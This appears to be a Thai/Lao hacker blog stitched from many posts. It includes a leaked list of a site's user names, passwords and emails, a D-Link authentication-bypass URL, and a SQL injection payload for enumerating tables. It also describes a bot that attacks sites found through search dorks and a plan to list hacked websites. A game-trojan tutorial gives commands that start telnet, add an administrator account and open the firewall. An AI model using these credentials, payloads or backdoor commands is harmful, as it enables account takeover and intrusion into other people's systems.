Default Apache config Path

Apache Logo
Apache httpd 2.2 default layout (apache.org source package):

ServerRoot              ::      /usr/local/apache2
DocumentRoot            ::      /usr/local/apache2/htdocs
Apache Config File      ::      /usr/local/apache2/conf/httpd.conf
Other Config Files      ::      /usr/local/apache2/conf/extra/
SSL Config File         ::      /usr/local/apache2/conf/extra/httpd-ssl.conf
ErrorLog                ::      /usr/local/apache2/logs/error_log
AccessLog               ::      /usr/local/apache2/logs/access_log
cgi-bin                 ::      /usr/local/apache2/cgi-bin (enabled by default, but the bundled scripts are 644)
binaries (apachectl)    ::      /usr/local/apache2/bin
start/stop              ::      /usr/local/apache2/bin/apachectl (start|restart|graceful|graceful-stop|stop|configtest)

Apache httpd 2.0 default layout (apache.org source package):


ServerRoot              ::      /usr/local/apache2
DocumentRoot            ::      /usr/local/apache2/htdocs
Apache Config File      ::      /usr/local/apache2/conf/httpd.conf
SSL Config              ::      /usr/local/apache2/conf/ssl.conf
ErrorLog                ::      /usr/local/apache2/logs/error_log
AccessLog               ::      /usr/local/apache2/logs/access_log
cgi-bin                 ::      /usr/local/apache2/cgi-bin (enabled by default, but the bundled scripts are 644)
binaries (apachectl)    ::      /usr/local/apache2/bin
start/stop              ::      /usr/local/apache2/bin/apachectl (start|stop|graceful|configtest)

Debian, Ubuntu (Apache httpd 2.x):

ServerRoot              ::      /etc/apache2
DocumentRoot            ::      /var/www
Apache Config Files     ::      /etc/apache2/apache2.conf

Loadkajai VIP User

[1] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[2] admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxx
[3] keng:dvd123:keng-pattaya@hotmail.com:2
[4] donk_roman:0827694101:roman_2550@yahoo.com:2
[22] hellomaple:6460176:hellomaple@hotmail.com:2
[39] maleficent:phil009:madamlamenta@hotmail.com:2
[45] Poa2553:3552AOp:Dsnsombut@hotmail.com:2
 .......

My Hello World.pl



See More At : http://pastebin.com/kfzr1ict

Edit : windows98SE : บ่อรู้เด้อ แต่ดูในเว็บมันก้อมีน่ะ

Twista Feat. Chris Brown - Make A Movie


Twista was one of the 100 rappers who they interviewed for the book- !HOW-T0. RAP| The Art&Science of the HipHop MC
 

My new page "Hacked Zone"


หลังจากที่ได้เห็น blog ของท่าน akira ผมก้อนืกในใจว่าอยากจะทำ page สำหลับเป็นหน้าที่เอาไว้บันทืก web ที่ผมได้เจาะไปแล้วใว้ในนั้น แต่ก้อยังไม่แน่ใจว่าจะดีไม งันผมขอ comment ใว้หน่อยว่าสมควนที่จะทำไม
ຫຼັງຈາກທີ່ໄດ້ເຫັນ blog ຂອງທ່ານ akira ຂ້ອຍກໍ່ນຶກໃນໃຈວ່າຢາກຈະເຮັດ page ສຳລັບເປັນຫນ້າທີ່ເອົາໃວ້ບັນທຶກ web ທີ່ຂ້ອຍໄດ້ເຈາະໄປແລ້ວໃວ້ໃນນັ້ນ ແຕ່ກໍ່ຍັງບໍ່ແນ່ໃຈ ສະນັ້ນເຮົາຂໍ comment ໃວ້ວ່າຈະສົມຄວນເຮັດດີບໍ່

[Python] - Boom Mail



ปล.รู้ pastebin เพราะ pe3z นะเน้ย ^^
ປລ. ຮູ້ pastebin ເພາະ pe3z ໄດ້ນິ

How to Make Keygen - by Edkung [TH]

Requirement
● Ollydbg 1.10 & Plugin ApiBreak (or Other Ollydbg Plugin for Breakpoint Windows API)
● Plugin Code Ripper for copy assembly code from Ollydbg
● Teleport Pro v 1.29 (Build 1107)
● IDE Borland Delphi 7 (or other IDE)
● Read How to crack Teleport Pro


Download Ebook Here

Credit:Edkung

D-Link Router Models Authentication Bypass Vulnerability

========================================================
D-Link Router Models Authentication Bypass Vulnerability
========================================================

# Exploit Title: Multiple D-Link Router Authentication Bypass Vulnerabilities
# Date: 12-01-2011
# Author: Craig Heffner, /dev/ttyS0
# Firmware Link: http://www.dlink.co.uk/
# Firmware Version(s): All
# Tested on: DIR-300, DIR-320, DIR-615 revD

Multiple D-Link routers that use a PHP based Web interface suffer from the same authentication bypass
vulnerability which allows unprivileged users to view and modify administrative router settings.
Further, even if remote administration is disabled this vulnerability can be exploited by a remote
attacker via a CSRF attack.

The vulnerability has been confirmed in the following routers:

    DIR-615 revD
    DIR-320
    DIR-300

The following example URL will allow access to the router's main administrative Web page without authentication:

    http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

For a more detailed description of the vulnerability, see: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf.

Note that this vulnerability was independently discovered in the DIR-300 and subsequently reported by Karol Celin on 09-Nov-2010 [1].

[1] http://www.securityfocus.com/archive/1/514687/30/120/threaded

Perl Scan Column SQL injection [ by Dreamclown]

สืกสามานานแล้ว แต่เพี่งมาเล่น perl ครั้งแลกก้อเลยลองเขืยน scan column ของ bug sql injection
ສຶກສາມາດົນແລ້ວ ແຕ່ຫາກໍ່ມາຫຼີ້ນ perl ຄັ້ງທຳອິດເລີຍລອງຂຽນ scan column ຂອງ bug sql injection


#!usr/bin/perl

Lan Over Internet with Hamachi



Hamachi จะทำงานในลักษณะ VPN (Virtual Private Network) คือการจำลอง Lan ผ่าน Internet

eBuddyWeb Messenger(0day) XSS Vulnerabilities [by Dreamclown]

# Exploit Title: eBuddyWeb Messenger(0day) XSS Vulnerabilities
# Google Dork: N/A
# Date: 30.11.2010
# Author: Dreamclown
# Software Link: N/A
# Version: N/A
# Tested on: Windows Xp Sp3
# CVE : N/A

Exploit-Database Submit Draft [28.11.10]


+เว็บดังเลยไม่กร้า submit อยากเก็บใว้เป็น 0day 

+ເວັບດັງເລີຍບໍ່ກ້າ submit ຢາກເກັບໃວ້ເປັນ 0day

เขืยน bot - Hack[SQL Injection] ด้วย VB [#1]

ก่อนานแล้วนะที่ผมเล่น SQL Injection ชื่งก่อ hack ใด้บ้างใม้ใด้บ้าง(crack md5 ใม้ใด้..อิอิ). อยู่วันหนื่งก่อใปรู้จัก hacker ท่านหนี่งที่ Thai Shadow [windows98se] แต่ใม้รู้ว่าเขารู้จักผมใม่นะ อิอิ...และก่อใปเห็น video ของท่านที่ใช้ในการเปีด course สอน เมื่อดูก่อเห็นว่ามี Code Perl ที่ใช้ในการหา Table,column,database ของเว็บที่มีบัด SQL ตอนนั้นอยากใด้มากกกกกก เลียลองเขียนเองดู ก่อเลียใช้ Google หา code perl มาศีกษา ผ่านใป 2 วัน
ก่อยังใม้ใด้ เลียคิดใด้ว่า vb ก่อน่าจะทำใด้เหมือนกัน ก้อเลียจัดการเขืยนในตอนนั้นเลีย. และเมีอเขียนใปใด้ 80% ก่อใปพบป้ญหาดังนี้

ตอนที่ใด้ html code กับมาใม้รู้ว่าจะหาค่า SQL query ที่แน่นอนในนั้นใด้ยังใง

การหาค่า SQL query ที่ติดมากับ html code นี้และผมว่าอยากสุด ก่อค่าที่ใด้มามันเปลื่ยนแปลงตามแต่ละเว็บ. แต่ก่อมีค่า query ที่เหมีอนกัน นั้นคือค่าที่ใด้มาจากคำสั่งนี้

hxxp://www.site.com/news.php?id=-1+union+all+select,1,2,3,table_name+from+information_schema.tables—

ชื่งจะมีค่านี้ CHARACTER_SETS ใน html code

ผมเลียใด้ idea มาว่า:

ถ้าเราให้ bot นี้ request เอาหน้าเว็บนี้มาแล้ว search หาค่า CHARACTER_SETS ใน html code จาก

XGoogle Bot v.0.1 Test [by Dreamclown]


-วันนี้เอา bot ที่ผมตั้งใจเขืยนมานานมา test ให้ดู ชื่ง bot นี้มันจะเอา search ตาม Google dork ที่ใส่แล้วก่อเอา Exploit มาต่อใส่เว็บที่หาได้ด้วย dork นั้นจากนั้นก่อ export ออกมาเป็น text file

 -ວັນນີ້ເອົາ bot ທີ່ຂ້ອຍຕັ້ງໃຂຂຽນມາດົນແລ້ວມາ test ໃຫ້ເບີ່ງ ເຊີ່ງ bot ນີ້ມັນຈະຕື່ມ exploit ໃສ່ google dork ທີ່ຫາມາໃສ່ໃນໂປແກມ ຈາກນັ້ນກໍ່ save ອອກມາເປັນ text file

+Download Flash Video Here..!!!!



-ส่วนใครที่อยากได้ รอผมทำสมบูนแล้วจะเอามาปร่อย

-ສ່ວນໃຜທີ່ຢາກໃດ້ ຖ້າເຮົາເຮັດໃດ້ຈະເອົາມາແຈກ

Edit:Type Of Hash Password







MD5      : d41d8cd98f00b204e9800998ecf8427e  =>  (32 char)
MD5x2   : 74be16979710d4c4e7c6647856088456  => (32 char)
MD5x3   : acf7ef943fdeb3cbfed8dd0d8f584731 => (32 char)
MD4      : 31d6cfe0d16ae931b73c59d7e0c089c0 => (32 char)
NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0 => (32 char)
LM       : aad3b435b51404eeaad3b435b51404ee => (32 char)
SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709 => (40 char)
SHA256   : e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 => (64 char)
SHA384   : 38b060a751ac96384cd9327eb1b1e36a21fd7bf63f6e1da274edad2b95b... = > (98 char)
SHA512   : cf83e1357eefb83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2bd47417a...  => (128 char)
RIPEMD160: 9c1185a5c5e9fc54612808977ee8f548b2258d31 => (40 char)

Counter Strike Trainer Code[by Dreamclown]

[TH]
+เป็น autoit code ที่ผมเขืยนเองคับ แบบว่าเอา spider trainer มาดัดแปง
[LA]
+ເປັນ autoit code ທີ່ຂ້ອຍຂຽນເອງ ເອົາຂອງເຂົາມາດັດແປງ

;==============================================
Break(0)
#include <
nmemory.au3>
$counter = "hl.exe"
$procid=ProcessExists($counter) 

  
;Read more for download

Metasploit - Grabbing Index Pages Of Webservers



msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24

msf auxiliary(http_index_grabber) > run

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html

[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/

[-] Received 403 for 209.20.85.8:80/

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/

[TH]
+ใช้หา่ file index ของ web servers ชื่งทำโดย Carnal0wnage


[LA]
+ໃຊ້ໃວ້ຫາ file index ຂອງ web servers ຊື່ງທຳໂດຍ Carnal0wnage

http://carnal0wnage.blogspot.com/2010/09/grabbing-index-pages-of-webservers.html

MySQL v.5 => Original Database & Table

[ 1 ] information_schema.COLUMNS
[ 2 ] information_schema.COLUMN_PRIVILEGES
[ 3 ] information_schema.KEY_COLUMN_USAGE
[ 4 ] information_schema.PROFILING
[ 5 ] information_schema.ROUTINES
[ 6 ] information_schema.SCHEMATA
[ 7 ] information_schema.SCHEMA_PRIVILEGES
[ 8 ] information_schema.STATISTICS
[ 9 ] information_schema.TABLES
[ 10 ] information_schema.TABLE_CONSTRAINTS
[ 11 ] information_schema.TABLE_PRIVILEGES
[ 12 ] information_schema.USER_PRIVILEGES
[ 13 ] information_schema.VIEWS

Secrets of Lock Picking

การแฮกนี้ทำใด้กะทุกอย่างจิงฯ..
ການແຮກກະແຈ
read more for download file...

Viruses Killer Team LOGO - For Team Only


+เนื่องจากผมได้คิดมานานแล้วแต่ไม่ใด้ทำสักที่ ชื่งผมคิดว่าจะลองใปชวนชาว hacker ใน thd(thaishadow.com) มาทำช่วยกันบาง

Hacking Telnet With DotA – [Static Code injection]

[TH]
ในนี้ผมใด้ทำ Video มาครับ เนื้อหาของ Video ก่อคือ: ผมจะทำ Static Code Injection เพื่อยัด Assembly Code ใส่เกม DotA แล้วเมื่อเปิดเกม Assembly Code ของเราก่อจะถูก run ชื่ง Assembly Code นี้จะทำสิ่งต่อใปนี้:
-เปิด Telnet เพื่อให้เรา connect เป็นหาคนที่เปิดเกม
-เพื่ม User ชื่อว่า user จากนั้นก่อทำ User นี้ให้อยู่ในระดับ Admin(เพื่อเวลาเรา telnet ใปหาจะใด้ใช้ User นี้เลีย)
-เปิด firewall traffic ให้สามารก telnet เข้าใปใด้
Assembly Code ที่ว่านั้นจะ run cmd command นี้:

sc start tlntsvr

net user user pass /add

net localgroup Administrators hacked /add

netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe avast enable

+สิ่งที่ต้องมี :
- Olly Debugger
- Frozen Throne.exe(เกม DotA)
- CFF Explorer (เพื่อ Import Module function ใน DLL file เข้า DotA)
- API Viewer

Download Video Part 1 [HD]
Download Video Part 2 [HD]
Download OllyDBG
Download Static code injection.txt
Download API Viewer
Download CFF Explorer